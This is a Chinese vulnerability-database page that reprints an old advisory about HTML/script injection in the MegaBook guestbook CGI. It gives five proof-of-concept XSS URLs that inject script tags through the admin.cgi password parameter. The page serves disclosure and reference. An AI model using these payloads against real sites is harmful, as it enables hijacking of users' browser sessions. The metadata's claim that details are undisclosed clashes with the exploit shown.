MegaBook 1.1/2.0/2.1 – Multiple HTML Injection Vulnerabilities
| 漏洞ID | 1053998 | 漏洞类型 | |
| 发布时间 | 2003-06-29 | 更新时间 | 2003-06-29 |
![图片[1]-MegaBook 1.1/2.0/2.1 – Multiple HTML Injection Vulnerabilities-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-MegaBook 1.1/2.0/2.1 – Multiple HTML Injection Vulnerabilities-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8065/info
MegaBook is prone to multiple HTML injection vulnerabilities. This is due to insufficient sanitization of HTML and script code from user-supplied input, including input supplied to the administrative login page and via the client HTTP User-Agent: header field. Exploitation of these issues could permit hostile HTML or script code to be injected into the guestbook system and rendered in the browser of a legitimate guestbook user.
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
http://www.example.com/admin.cgi?action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>相关推荐: Kerio MailServer服务拒绝(挂起)漏洞
Kerio MailServer服务拒绝(挂起)漏洞 漏洞ID 1202918 漏洞类型 未知 发布时间 2003-04-11 更新时间 2003-04-11 CVE编号 CVE-2002-1433 CNNVD-ID CNNVD-200304-071 漏洞平台…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666